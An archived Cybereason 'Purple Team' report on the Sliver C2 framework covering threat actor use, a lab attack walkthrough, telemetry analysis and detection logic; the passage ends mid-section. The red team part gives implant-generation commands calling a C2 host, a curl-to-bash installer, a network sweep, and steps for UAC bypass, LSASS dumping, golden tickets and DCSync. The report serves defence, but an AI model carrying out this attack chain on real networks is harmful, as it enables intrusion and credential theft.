{
	"id": "f1a07eb3-c827-4653-b30c-039e5f607478",
	"created_at": "2026-04-06T00:22:22.048695Z",
	"updated_at": "2026-04-10T03:37:32.548598Z",
	"deleted_at": null,
	"sha1_hash": "2f1804f3ba7112c546ac39ca9576afb1bf2b4e91",
	"title": "Sliver C2 Leveraged by Many Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4675700,
	"plain_text": "Sliver C2 Leveraged by Many Threat Actors\r\nBy Cybereason Global SOC and Incident Response Team\r\nArchived: 2026-04-05 12:56:36 UTC\r\nWhat you need to know about this attack framework before it replaces Cobalt\r\nStrike\r\nThis particular Threat Analysis report is part of a series named “Purple Team Series”, covering widely used attack\r\ntechniques, how threat actors are leveraging them and how to detect their use.\r\nIntroduction\r\nCybereason’s GSOC and Incident Response teams have analyzed a growing C2 framework named Sliver,\r\ncreated by a cybersecurity company named Bishop Fox. C2 frameworks or Command and Control (C\u0026C)\r\ninfrastructure are used by security professionals (red teamers and pentesters) to remotely control compromised\r\nmachines during security assessments. They are also leveraged by threat actors for the same reason.\r\nFollowing this introduction, we describe in detail how this framework works, how to reproduce its use, how threat\r\nactors are leveraging it and how to implement detection and prevention mechanisms.\r\nAs always in this Purple Team series, the Cybereason GSOC covers the topic from different perspectives:\r\nDescription of the Sliver C2 framework\r\nRed team aspects - getting Sliver C2 on the test bench\r\nBlue team aspects - analyzing a past case of BumbleBee infection that led to the use of Sliver C2\r\nPurple team aspects - using blue and red knowledge, producing detections and analysis capabilities\r\nIn the following table, we created an index of the identified features of Sliver C2 and their corresponding section\r\nin the MITRE ATT\u0026CK framework:\r\nKey Points\r\nThe Cybereason GSOC team extracted the following key points from its research of Sliver C2:\r\nA new trend: Sliver C2 is gaining more and more traction among threat actors and is often seen as an alternative to\r\nCobalt Strike.\r\nModular framework: Extension package manager (armory) allowing easy installation (automatic compilation)
of\r\nvarious 3rd party tools such as BOFs and .NET tooling like Ghostpack (Rubeus, Seatbelt, SharpUp,\r\nCertify, etc).\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 1 of 47\n\nAlready associated with known threat actors and malware families: BumbleBee loader infections are often\r\nfollowed by the loading of Sliver C2. Threat actors like APT29 are also known to leverage this framework.\r\nUnique network and system signatures: The detection of Sliver C2 is possible as this framework creates\r\nspecific signatures when executing Sliver-specific features. Detections and fingerprinting of the\r\ninfrastructure server also exist and are listed in this article.\r\nSliver C2 Description and Past Uses\r\nWhat is it?\r\nSliver is an open source cross-platform adversary emulation/red team framework. It’s designed to be scalable and\r\ncan be used by organizations of all sizes to perform security testing.\r\nSliver is comparable to Cobalt Strike or Metasploit.\r\nWhy is it Getting More Traction?
\r\nSliver C2 is gaining popularity for these reasons:\r\nOpen-source alternative to Cobalt Strike and Metasploit\r\nModularity of the platform with Armory\r\nCross-platform: OS X, Linux and Windows\r\nThe framework provides all core capabilities for adversary simulation, the most notable being:\r\nDynamic code generation\r\nCompile-time obfuscation\r\nMultiplayer-mode\r\nStaged and Stageless payloads\r\nSecure C2 over mTLS, WireGuard, HTTP(S), and DNS\r\nWindows process migration, process injection, user token manipulation, etc.\r\nLet's Encrypt integration\r\nIn-memory .NET assembly execution\r\nCOFF/BOF in-memory loader\r\nTCP and named pipe pivots\r\nArmory, alias and extension package manager\r\nIn the Red team section, we analyze how Sliver C2 can be leveraged in a real-life attack scenario.\r\nThreat Actors Leveraging Sliver C2\r\nSliver C2 has been gaining more and more traction since its release in 2020. As of today, the number of threat intelligence\r\nreports is still low and the main reports describe the use of Sliver C2 by the Russian SVR.\r\nRecently, some threat research teams, including the Cybereason GSOC, identified cases of BumbleBee loaders\r\ndropping Sliver C2 following the initial infection.\r\nSVR / APT29 (2021)\r\nThreat Actor | Malware Families | Dates | Links\r\nAPT29 / SVR / Cozy Bear / the Duke | N/A | May 2021 | NCSC\r\nThe threat actor called APT29, associated with Russian secret services, has been reported by different\r\norganizations as using Sliver C2 to ensure persistence on a compromised network.\r\nAccording to this report, by the National Cyber Security Centre (NCSC), the use of the Sliver C2 was “likely an\r\nattempt to ensure access to a number of the existing WellMess and WellMail victims was maintained”.
\r\nIn this specific case, the SVR operators used a specific Sliver C2 infrastructure server for each compromise.\r\nTA551 / Shathak (2021)\r\nThreat Actor | Malware Families | Dates | Links\r\nTA551 / Shathak | N/A | October 2021 | Proofpoint\r\nSecurity researchers from the company Proofpoint identified emails with attached Microsoft Office documents,\r\ncontaining malicious macros, that if enabled, lead to the deployment of the Sliver C2 framework.\r\nTA551 has been previously associated with distributing malware families such as Ursnif, IcedID, QBot/Qakbot,\r\netc.\r\nIn this case, Sliver was directly loaded after the initial infection vector, unlike previous cases involving TA551\r\nwhere frameworks such as Cobalt Strike were loaded in a second step following the initial infection. This use of\r\nSliver gave the threat actor much more flexibility.\r\nExotic Lily (2022)\r\nThreat Actor | Malware Families | Dates | Link\r\nExotic Lily | BumbleBee Loader | 2022 | Cybereason\r\nThe Cybereason GSOC team has previously reported on BumbleBee loader infections leading to the deployment\r\nof a C2 framework.\r\nRecently, the Cybereason GSOC team observed a typical BumbleBee loader infection, starting from a LNK\r\ninfection vector, ultimately leading to the deployment of Sliver C2 in order for the threat actor to obtain\r\npersistence on the network.\r\nIn this chapter, we describe the attack path employed by the threat actors.\r\nThe Cybereason GSOC drafted the following timeline:\r\nActivities | Time\r\nInitial access with BumbleBee Loader | T0\r\nReconnaissance / tasklist | T0 + 2 minutes\r\nCommand and Control / Sliver C2 | T0 + 11 minutes\r\nCommand and Control / Sliver C2 Shell feature | T0 + 41 minutes\r\nReconnaissance / whoami | T0 + 42 minutes\r\nThe scenario itself was stopped almost at its beginning, due to a user intervention and the detection of the attack.\r\nRed Team - Discovering and Using the
Sliver C2 Framework\r\nSliver is designed as a second stage payload which, after deployment, gives the threat actor full access to the\r\ntarget system and the ability to conduct the next steps in the attack chain.\r\nSliver Framework architecture\r\nThere are four major components to the Sliver C2 ecosystem:\r\nServer Console - The server console is the main interface, which is started when you run the sliver-server\r\nexecutable. The server console is a superset of the client console. All code is shared between the\r\nclient/server consoles except server-specific commands related to client (operator) management. The server\r\nconsole communicates with the server over a gRPC interface.\r\nSliver C2 Server - The Sliver C2 server is also part of the sliver-server executable; it manages the internal\r\ndatabase and starts and stops network listeners. The main interface used to interact with the server is the gRPC\r\ninterface, through which all functionality is implemented.\r\nClient Console - The client console is the primary user interface that is used to interact with the Sliver C2\r\nserver.
\r\nImplant - The implant is the actual malicious code run on the target system you want remote access to.\r\nWe describe the relations between each component through the following diagram, putting the Sliver C2 server at\r\nthe center of the exchanges, for the attacker to use for remote management.\r\nSliver C2 various components and their interaction, as explained in the above paragraph\r\nHow to Use Sliver C2?\r\nInstallation\r\nFramework base installation is easy and consists of downloading and running a bash script: curl https://sliver.sh/install | sudo bash\r\nCybereason GSOC has analyzed the script and the following actions are performed as of the publication of this\r\nanalysis:\r\nInstalling the following dependencies: gpg, curl, build-essential, mingw-w64, binutils-mingw-w64, g++-mingw-w64 (mainly related to the compilation)\r\nDownloading the Sliver C2 binaries from the release page and verifying their integrity\r\nInstalling a systemd service for Sliver C2 to run as a system service (daemon)\r\nGenerating client configurations for all users on the system in order to allow them to connect and conduct an\r\nattack campaign in parallel.\r\nThe Sliver server running as a system service gives multiple operators the ability to connect.\r\nSliver implants support two modes of operation:\r\nBeacon mode - beacon mode implements an asynchronous communication style where the implant\r\nperiodically checks in with the server, retrieves tasks, executes them, and returns the results.\r\nSession mode - in session mode the implant will create an interactive real time session using either a\r\npersistent connection or long polling depending on the underlying C2 protocol.\r\nImplant\r\nSliver C2 implants are cross-platform; you can change the compiler target with the --os flag.
Sliver accepts any\r\nGolang GOOS and GOARCH as arguments to --os and --arch.\r\nWe generated implants for Linux, Mac and Windows with the following commands:\r\ngenerate --mtls [C2 Public IP]:443 --os linux --arch amd64\r\ngenerate --mtls [C2 Public IP]:443 --os mac --arch arm64\r\ngenerate --mtls [C2 Public IP]:443 --os windows --arch amd64\r\nSliver C2 implants for different platforms (OS/Arch)\r\nThe command generate info can be used to list all supported compilation targets.\r\nListener\r\nBefore you can catch the shell, you'll first need to start a listener. The following protocols are supported:\r\nmTLS\r\nMutual Transport Layer Security (mTLS) is a process that establishes an encrypted TLS connection\r\nin which both parties use X.509 digital certificates to authenticate each other\r\nHTTP\r\nHTTPS\r\nDNS\r\nWireguard\r\nListeners support both session and beacon callbacks. The implants in our example are generated for the mTLS\r\nprotocol on port 443 and therefore we start the mTLS listener:\r\nStarting mTLS listener and displaying currently active listeners\r\nSessions\r\nAfter implant execution on the target host a session is created:\r\nDisplaying current sessions\r\nThe use command with the session id provides an interactive session with the remote target:\r\nInteraction with session\r\nAt the time of writing this article the Sliver interactive session provides the following commands:\r\nThe list of supported commands in session mode\r\nArmory\r\nThe armory is the Sliver Alias and Extension package manager, which allows you to automatically install various\r\n3rd party tools such as BOFs and .NET tooling. The list of tools is available on Github.
It is also possible to install\r\npackages in bundles.\r\nUsing Sliver C2 to Create a Complete Attack Path\r\nIn this section, we explore the different features offered by Sliver, used in a logical order for an attacker, from\r\ninitial infection to domain administrator escalation and data exfiltration. In the Blue team section, those will be\r\nanalyzed from the defender's perspective.\r\nThis will help us to create detection rules, described in the Purple team section.\r\nThe Sliver C2 implant is designed to be used as a second stage payload (not leveraged during the initial infection step),\r\ndeployed after the attacker has gained access to the target system using an initial infection vector such as\r\nphishing, drive-by download, or exploitation of unpatched vulnerabilities.\r\nThis part is out of scope for this article and therefore we executed the implant directly on the target system.\r\nWe present the attack scenario following the MITRE tactic order, introducing each Sliver C2 feature as a “link”\r\nof the attack chain.
\r\nThe target organization is composed of three assets:\r\nA workstation, in the workstation network zone\r\nA server, hosted in the DMZ network zone\r\nA domain controller, in the server network zone.\r\nDifferent stages of the attack and Sliver C2 commands and features: Execution, Privilege Escalation, Persistence,\r\nCredential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration\r\nExecution\r\nThe Sliver C2 implant is executed on the workstation as a stage 2 payload and from the Sliver C2 server we get a shell\r\nsession; this session provides multiple methods to execute commands and other scripts or binaries.\r\nRed team - Shell Command\r\nThe Sliver C2 session has a built-in shell command to spawn a PowerShell command prompt. However this is\r\nconsidered bad practice and will leave obvious logs on the target system for detections.\r\nObtaining a PowerShell prompt from Sliver C2\r\nRed team - Execute Command\r\nThe preferred method to execute a program on the target is the execute command, which can also capture the output.\r\nUsing the Sliver C2 built-in execute command\r\nRunAs\r\nRun a new process in the context of the designated user (Windows only).\r\nRunning the ipconfig command as the localAdmin user\r\nPrivilege Escalation\r\nWe obtain access to a workstation, with an account that is part of the “administrators” local group. However, we\r\nneed to elevate the process to NT Authority/System, enabling us to perform high-privilege actions like process memory\r\ndumps.\r\nUAC Bypass\r\nUser Account Control bypass can be done using multiple available techniques. For this purpose we use cmstp.exe,\r\nwhich is a Windows system binary.
The details and the source code for the exploit are available here.\r\nUAC bypass exploit source files\r\nNext, we upload the files to the victim machine and execute the PowerShell script to return a new session with\r\nUAC bypassed.\r\nExecution of UAC bypass exploit\r\nGetsystem\r\nAfter the UAC bypass we are able to use the built-in getsystem command to spawn a new Sliver session as the NT\r\nAUTHORITY\\SYSTEM user.\r\nExecuting the built-in getsystem command\r\nTesting the newly obtained privileges shows that the current user is indeed NT AUTHORITY\\SYSTEM.\r\nSession user after getsystem command\r\nDefense Evasion\r\nThis section describes the features of the Sliver C2 implant used to avoid detections.\r\nMigrate\r\nWe use the built-in migrate command to hide the Sliver C2 implant in another process for defense evasion\r\npurposes.\r\nUsing the Sliver C2 migrate command\r\nCredential Access\r\nWith the obtained privileges, we use the built-in procdump command to dump the “lsass.exe” process memory and\r\nretrieve credentials offline on the Sliver C2 server.\r\nDumping lsass.exe memory with the built-in procdump command\r\nOffline reading of the memory dump on Linux (Sliver C2 server) can be done using pypykatz.\r\nPypykatz reading lsass.exe memory dump (complete output omitted)\r\nWe are able to obtain the password of a logged in user (STAGEZERO\\alon).
\r\nDiscovery\r\nIn this stage we use Sliver C2 to get information about Active Directory as well as to discover new machines to pivot\r\nto.\r\nNetwork Scan\r\nWe use the Sliver C2 interactive shell to run PowerShell commands; the following command scans the network to\r\ndiscover live hosts.\r\nNetwork scan from Sliver C2 shell\r\nThe live host with IP address 10.0.2.10 will be our target for the lateral movement.\r\nRetrieving the hostname of 10.0.2.10\r\nThe FQDN of 10.0.2.10 in the STAGEZERO domain is s1-confluence.stagezero.lab.\r\nActive Directory Discovery\r\nWe use Windows system binaries with the Sliver C2 built-in execute command for Active Directory discovery.\r\nUsing net to discover STAGEZERO domain administrators\r\nUsing nltest to discover STAGEZERO domain controllers\r\nLateral Movement\r\nDuring the credential access stage we obtained the credentials for the STAGEZERO\\alon user and in the discovery stage\r\nwe found another host, s1-confluence.stagezero.lab. This information will be used for lateral movement.\r\nPsExec\r\nWe leverage the Sliver C2 built-in psexec command to achieve lateral movement:\r\nLateral movement to s1-confluence server\r\nOn this new machine we perform the same actions (a process dump of the lsass.exe process memory, pypykatz\r\noffline launch) to access credentials.\r\nThese steps give us access to the user stagezero_adm which, we know from Active Directory discovery, is a\r\ndomain administrator account.\r\nStagezero_adm account credentials\r\nWith domain administrator credentials we will forge a Kerberos Golden ticket in order to obtain full access to all\r\ndomain joined systems.
We leverage Rubeus, installed from the Sliver C2 Armory, to obtain a Kerberos TGT to\r\nauthenticate as stagezero_adm.\r\nUsing Rubeus to get a TGT for the stagezero_adm account\r\nWe use the Kerberos TGT ticket or the credentials obtained from the offline memory dump with the psexec command to\r\nmove laterally to the domain controller (DC-1).\r\nIn order to forge a Kerberos Golden Ticket we upload the latest Mimikatz release to the DC-1 machine with the Sliver C2\r\nbuilt-in upload command, unzip the archive and execute the Mimikatz binary.\r\nUpload and unzip Mimikatz on target machine\r\nWe use the Mimikatz dcsync command to obtain the krbtgt account password hash, which is used to sign Kerberos\r\ntickets.\r\nObtaining krbtgt account password hash\r\nThe Kerberos Golden ticket can be obtained using Rubeus through the Sliver C2 implant:\r\nForging Kerberos Golden Ticket with Rubeus\r\nThis grants us Domain Administrator privileges and represents full domain compromise by the attacker.\r\nCollection \u0026 Exfiltration\r\nIn this section we use Sliver C2 features to access the target's internal systems.\r\nSocks Proxy\r\nSliver C2 has a built-in SOCKS5 command to open a proxy; this proxy facilitates communication with internal\r\nservers by routing network traffic to the actual server on behalf of a client (target machine with Sliver C2\r\nimplant).\r\nSetup SOCKS5 proxy with Sliver C2\r\nAfter configuring our browser to use the SOCKS proxy we can access internal resources of the compromised\r\ndomain.\r\nAccessing s1-confluence server using
SOCKS proxy\r\nWireguard\r\nSliver C2 offers another built-in method to access victims' networks, the WireGuard VPN implant.\r\nSetup Sliver C2 Wireguard listener\r\nThe Endpoint setting must be configured to point to the Sliver C2 server's WireGuard listener, 40.88.146.221:999\r\nin our case.\r\nRunning Sliver C2 Wireguard implant\r\nAfter setting up the port forwarding with the built-in “wg-portfwd add --remote 10.0.1.10:3389” command we can access\r\nthe victim's internal resources.\r\nRDP connection to victim's internal server (DC-1)\r\nIn previous stages we used Sliver C2 to obtain multiple accesses (HTTP, RDP) to the victim's internal network and\r\ndomain administrator credentials. We can now exfiltrate sensitive data from the victim's systems through the created\r\ntunnels or through the Sliver C2 implants.\r\nBlue Team - Analysis of Sliver C2 Framework use\r\nIn this chapter, we put on the “Security analyst” hat and analyze the resulting telemetry collected during our\r\nattack simulation using the Sliver C2 framework.\r\nThe article follows the same chronological order as the attack.\r\nAnalyzing the Produced Attack\r\nAs a reminder, our “victim” organization is composed of three assets:\r\nA workstation, in the workstation network zone, which is the entry point of the attacker, through spear\r\nphishing\r\nA server, hosted in the DMZ network zone, which is used for documentation and hosts a Confluence\r\nservice\r\nA domain controller, in the server network zone.\r\nExecution and OS Discovery\r\nThe attacker first executes the Sliver beacon named nasty_roast.exe on the initial victim machine, a workstation.
\r\nExecution of the Sliver C2 implant, under the name “NASTY_ROAST.exe”\r\nAnalyzing the nasty_roast.exe process further, we discover network connections to what seems to be the Sliver C2\r\nserver, on TCP port 8888:\r\nNetwork connection to the Sliver C2\r\nThe attacker then executes whoami.exe /all from the beacon:\r\nCybereason Process Tree showing whoami.exe being spawned from nasty_roast.exe\r\nThis command displays the execution context of the user running the malicious implant.\r\nBlue team - Command Execution\r\nThe attacker continues the discovery through “net.exe” commands:\r\nNet.exe commands displaying the local administrators group content as well as the Active Directory “domain\r\nadmins” group\r\nPrivilege Escalation\r\nBlue Team - UAC Bypass\r\nThe first step needed for the attacker is to obtain NT\\System privileges. In order to obtain that privilege, the\r\nattacker needs to bypass User Account Control or “UAC”.\r\nIn the lab environment, the attacker compiles C# source code (.cs extension), which results in the file cmstp-uac-bypass.dll:\r\nEditing and compiling the DLL designed to bypass UAC\r\nThe attacker then executes a PowerShell script that leverages the produced DLL, through the command\r\npowershell C:\\Users\\[..]\\Documents\\file\\uac.ps1:\r\nPowershell.exe spawned from the Sliver C2 implant, creating a cmstp.exe process\r\nThis method allows the attacker to leverage cmstp.exe to bypass UAC on the machine.\r\nThe resulting command is:\r\n\"c:\\windows\\system32\\cmstp.exe\" /au C:\\windows\\temp\\y1zuhb4s.inf\r\nWe can observe that the DLL is loaded reflectively in the powershell.exe process itself:\r\nLoaded modules of powershell.exe\r\nAs a result of the
attacker executing this UAC bypass, we identify a newly created “nasty_roast.exe” process,\r\nwith “dllhost.exe” as its parent:\r\nProcess “nasty_roast.exe” in an elevated state\r\nOne can notice the attribute “Elevated child process privileges”, resulting from the process elevation.\r\nThe attacker follows this step with another whoami.exe /all command. But this process still runs under the user\r\naccount and not NT\\System.\r\nThe next logical step is for the attacker to execute the “GetSystem” Sliver C2 command to attain System privileges\r\non the victim machine, which results in an injection into the spoolsv.exe process:\r\nInjection into spoolsv.exe, with “system” privileges\r\nAs a result, we identify a chain of injections into the spoolsv.exe process, executed in the NT\\System user context.\r\nThe attacker follows the spoolsv.exe injection with another whoami /all command to verify his permissions.\r\nThe injection function is marked as “CreateRemoteThread”, indicating that the Sliver C2 implant is creating a\r\nremote thread in spoolsv.exe.\r\nWe later observe the use of the “Shell” feature of Sliver C2, spawning powershell.exe in a unique fashion:\r\nExecution of powershell.exe with a specific argument, unique to Sliver C2\r\nAs this is unique to Sliver C2, it can be used for a detection, later in the article.\r\nCredential Access\r\nNow that the attacker has obtained full user privileges, he will proceed to gather user accounts on the machine.
\r\nBlue Team - Execute-Assembly\r\nThe attacker leverages the “Execute-Assembly” Silver C2 feature to interrogate the domain controller LDAP\r\nservice:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 30 of 47\n\nInjection from spoolsv.exe to notepad.exe, connecting to the domain controller on TCP port 389 (LDAP)\r\nThe analysis shows that, by default, Sliver C2 implants will create notepad.exe processes and inject into them\r\nwhen using such feature.\r\nBlue Team - LSASS Dump\r\nFollowing this activity, the attacker attempts another method to steal user credentials from the victim machine.\r\nThe attacker executes a memory dump of the lsass.exe process:\r\nCreation of a MalOp and a process tree new item following the memory dump of lsass.exe\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 31 of 47\n\nThe attacker then analyzes the memory dump from the host itself, leveraging mimikatz.exe:\r\nMimikatz.exe execution\r\nAt this point, the attacker possesses accounts of the local user and domain users actively connected to the victim\r\nmachine.\r\nDiscovery\r\nThe attacker leverages powershell.exe to scan the internal network through the following command :\r\npowershell \"5..15 | ForEach-Object {Get-WmiObject Win32_PingStatus -Filter Address=10.0.2.$_\" and\r\nTimeout=200 and ResolveAddressNames=true and \"StatusCode=0 | select ProtocolAddress*}\"\r\nAttacker then uses Windows system binaries (net.exe, nltest.exe) to get Active Directory information discovery\r\ncommands:\r\nActive Directory discovery\r\nLateral Movement\r\nFollowing the discovery and credential theft activities, the attacker now progresses to the other assets discovered.\r\nFrom the Workstation to the DMZ Server\r\nThe attacker remotely creates a service on the server, under the machine’s system privileges : \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 32 of 47\n\nFirst, the attacker 
remotely starts a service on the server from the workstation through the\r\nRCreateServiceW function of the Microsoft Remote Procedure Call (RPC) technology for distributed\r\nnetworks:\r\nThis MSRPC indicated the creation of a remote service from alon-wks to s1-confluence.stagezero.lab\r\nThen, we observe the creation of a new process, corresponding to the Sliver C2 implant, spawned by\r\nservices.exe on the s1-confluence server:\r\nRemote creation and starting of the the “pentest2” service, executing a randomly generated process\r\n(wehsbmf4im.exe)\r\nThe created remote service defaults with the name “Sliver”. In that case, the attacker changes it on purpose to\r\n“pentest2”. \r\nBlue Team - Lateral Movement through PsExec\r\nThis action results from the use of the “PsExec” remote command of Sliver C2, creating an implant executable\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 33 of 47\n\nwith a randomly generated name. In that case, the path is c:\\windows\\temp\\wehsbmf4im.exe).\r\nAs like the other implants on the workstation, this implant also communicates with the Sliver C2 server\r\ninfrastructure, on TCP port 8888.\r\nFollowing the lateral movement, the attacker again checks his user privileges through the whoami /all command. \r\nFollowing this action, another injection to notepad.exe relates to the use of the Sliver C2 “Execute-Assembly”\r\nfunction.\r\nHe also executes the command “nltest /dclist” to identify the name of the domain controller, which is probably\r\ngoing to be his next target.\r\nThe created and injected notepad.exe process contains a module named Rubeus: \r\nLoaded processes of notepad.exe, showing again the use of Execute-Assembly\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 34 of 47\n\nRubeus is a C# program used for raw Kerberos interaction and abuses. 
In that case, it is used to interact with the\r\ndomain controller.\r\nOn top of using Rubeus, the attacker also leverages another memory dump of lsass.exe, directly from the implant\r\nprocess: \r\nSuspicions around the process wehsbmf4im.exe (Sliver C2 implant remotely deployed on the server), showing the\r\nmemory dump of lsass.exe\r\nThe use of Rubeus indicates a potential Kerberos ticket manipulation in order to reuse the stolen accounts with a\r\npass-the-ticket attack.\r\nThe fact that a session was established while the attack was ongoing shows that the domain administration\r\nprivileges were obtained by the attacker:\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 35 of 47\n\nLogon Session established with the domain administrator account \r\nFrom the DMZ Server to the Domain Controller\r\nIn order to control the domain controller (dc-1), the attacker targets it through the use, again, of the PsExec\r\nmethod: \r\nFile event showing the creation of another remote service on the domain controller\r\nAt this point, the attacker controls the domain controller of the environment.\r\nOn the domain controller, the attacker executes similar actions as on the server and workstation previously: \r\nInjection to notepad.exe indicating the use of Silver C2 armory modules with the Execute-Assembly\r\nmethod\r\nRubeus use through the Execute-Assembly feature \r\nLaunch of mimikatz.exe through the Shell feature of Sliver C2\r\nCreation and manipulation of Kerberos tickets\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 36 of 47\n\nLSASS memory dump for credential theft\r\nFile event indicating the file manipulation of Kerberos tickets\r\nThe attacker finally leverages the “DCSync” feature of Mimikatz to impersonate a domain controller in order to\r\nsteal the credential database :\r\nThis MSRPC shows the use of Domain Controller replication, that can be abused in stealing AD 
credentials\r\nCollection\r\nAs the attacker prepares for data exfiltration, we detect new activities including the spawning of another Sliver\r\nC2 implant under the process necessary_eviction.exe (random name generated by Sliver C2).\r\nFirst, the attacker drops the newly generated implant, as shown in the following file event: \r\nFile event indicating the drop of a new executable (Sliver C2 implant)\r\nThen, the attacker executes the file:\r\nNew implant executed on the domain controller\r\nThis time, the attacker configured the implant to reach the Sliver C2 server infrastructure through the UDP port\r\n999 (non-default port, the default one is 51820):\r\nUDP Connection to the Sliver C2 server\r\nAt this stage, any analyst familiar with the Sliver C2 framework would surmise that WireGuard, the only\r\nUDP-based protocol used by the framework, fits this behavior. 
On the Sliver C2 project wiki,\r\na page clarifies the use of port forwarding and indicates that WireGuard should be used for better remote access to\r\nthe internal network: \r\nhttps://github.com/BishopFox/sliver/wiki/Port-Forwarding\r\nFollowing the WireGuard implant creation, the attacker initiates a connection to the RDP service of the DMZ server\r\n(s1-confluence), as shown in the connection screen: \r\nConnection screen showing TCP connection on the 3389 port (RDP) of the DMZ server\r\nThis connection was created through the use of the WireGuard port forwarding feature of Sliver C2.\r\nInterestingly enough, we also identified the initial implant, fnhoczptph.exe, showing proxy activity to target the\r\nConfluence port of the s1-confluence DMZ server: \r\nThis shows the attacker exfiltrating data from the internal Confluence server\r\nPurple team - Detection and Hunting strategies for Sliver C2\r\nIn this section, we list tools and techniques to detect the use of the Sliver C2 framework.\r\nHunting for Sliver Infrastructure \r\nWe can identify suspicious processes with connections to external servers that are likely to be part of a Sliver C2\r\ninfrastructure. 
In this section, we will list all the methods we discovered so far.\r\nTLS Certificates and JARM hashes\r\nJARM is an active Transport Layer Security (TLS) server fingerprinting tool.\r\nAs stated by Salesforce, creator of this fingerprinting tool, scanning with JARM provides the ability to identify\r\nand group malicious servers on the Internet.\r\nSimilar to Cobalt Strike, we identified that Sliver C2, by default, will generate a TLS configuration that is typical\r\nfor Sliver, as outlined by this article from Microsoft's Threat Intel team.\r\nWhen trying to fingerprint our C2 server’s TLS service (configured with mTLS beacon communication), we\r\nindeed identify this hash:\r\nSalesforce JARM tool launched against a Sliver C2 \r\nThat means that if there is a suspicious connection from a process on a machine, one can identify that it is a Sliver\r\nC2 server through its JARM hash.\r\nThe following values can be used to decide if it’s a Sliver C2 infrastructure:\r\nHTTPS 3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910\r\nMTLS 00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01\r\nOne has to be careful though, as this JARM hash can be shared with other non-Sliver C2 servers. 
This check has\r\nto be specific to when there is a suspicion of a C2, not the other way around (looking for Sliver C2 in a large\r\ndataset of TLS servers).\r\nDetection Logic \r\nProcess has network connections with an SSL/TLS service that has a JARM hash of\r\n3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910 OR \r\n00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01\r\nWeb Server Headers (HTTP) \r\nThis detection logic only works when the beacon configuration mode is HTTPS, and does not work for mTLS.\r\nAfter setting up an HTTPS listener on the Sliver C2 server, we reach out through the openssl command: \r\nOpenssl tool to connect to the Sliver C2 HTTPS listener\r\nWe can observe that the certificate chain is particular and can help identify Sliver C2 (use of US cities in\r\nconjunction with “CN = localhost”).\r\nUpon requesting the “/” web path, we obtain the familiar “404 Not Found” message, without clear indicators.\r\nResponse to a request on the web root path of the Sliver C2 server\r\nUpon making a “wrong” request, we get this 400 error message: \r\nResponse to a malformed request\r\nThis can be used as a confirmation that the server is Sliver C2. It should be used in combination with the JARM\r\ndetection.\r\nDetection Logic \r\nJARM detection logic and process connects to a TLS service that answers “HTTP/1.1 400 Bad Request\r\nContent-Type: text/plain; charset=utf-8\r\nConnection: close” \r\nfor malformed requests\r\nWireGuard Server Listener\r\nBy default, the WireGuard VPN server, and therefore the Sliver C2 WireGuard listener, uses UDP port 51820. 
This\r\ncan lead to false positives and needs to be correlated with other findings.\r\nDetection Logic \r\nPublic IP address listening on UDP port 51820\r\nHunting for Sliver C2 Implants \r\nThe use of Sliver C2 generates many unique behaviors that can be used as detection triggers. In the following\r\ndiagram, we list all the detection techniques identified through this research.\r\nIn the following chapter, we dedicate one subchapter to each detection technique. Anyone can implement these\r\ndetection methods in their favorite security detection tool in order to spot the use of Sliver C2 in a specific\r\nenvironment.\r\nShell Feature - Detection of specific Powershell command line\r\nAs stated in the above chapters, Sliver C2 has a very unique way of spawning the powershell.exe process when the\r\nSliver C2 'Shell' command is executed for a specific implant.\r\nTo detect the use of the “Shell” feature of Sliver C2, it is possible to look for any process spawning a\r\npowershell.exe child process with a command line containing “-NoExit -Command [Console]::OutputEncoding=\r\n[Text.UTF8Encoding]::UTF8”.\r\nThe following detection logic sums up this rule:\r\nDetection Logic \r\nProcess name is powershell.exe with a command line that contains “-NoExit -Command\r\n[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8”\r\nSliver Execute-Assembly or Migrate Feature \r\nThe Sliver C2 migrate command by default injects the implant binary into newly created notepad.exe processes and\r\ncreates a remote thread to run the malicious code.\r\nSysmon Event ID 8 (CreateRemoteThread) can be used to detect this. 
\r\nRemote thread creation log inside notepad.exe, as seen from a Sysmon event log\r\nDetection Logic \r\nDetect call(s) to the CreateRemoteThread Windows API to run code inside another process named notepad.exe\r\nSliver GetSystem Detection \r\nWhen the Sliver C2 getsystem command is executed from the administration panel, we identified that the process\r\nhosting the current implant will systematically inject itself into the spoolsv.exe process.\r\nInjected thread (CreateRemoteThread) from any process into spoolsv.exe.\r\nDetection Logic \r\nDetect call(s) to the CreateRemoteThread Windows API to run code inside another process named spoolsv.exe\r\nPsExec Feature Detection \r\nThe Sliver C2 built-in PsExec command, used for lateral movement, creates a service on the remote machine with the default\r\nname “Sliver”.\r\nService creation with the name “Sliver”\r\nDetection Logic \r\nProcess creates remote Windows service containing the name “Sliver” \r\nSliver C2 payloads in C:\\Windows\\Temp\r\nWithout any customization, Sliver delivers its payloads remotely in the C:\\Windows\\Temp directory.\r\nAlthough it might lead to false positives, searching for suspicious/injected processes using any image file stored\r\nin this folder can identify the use of Sliver C2.\r\nDetection Logic \r\nProcess creates executable file or script in C:\\Windows\\Temp directory\r\nOR \r\nProcess created from an image file residing in the C:\\Windows\\Temp directory\r\nSpecific Network Port Communication \r\nSliver C2 server listens on default ports if not instructed otherwise: \r\nTCP Port 8888 for the mTLS service\r\nUDP Port 51820 for the WireGuard service\r\nTCP Port 443 for the HTTPS service\r\nThe communications on port 443 are too common to be a detection factor. 
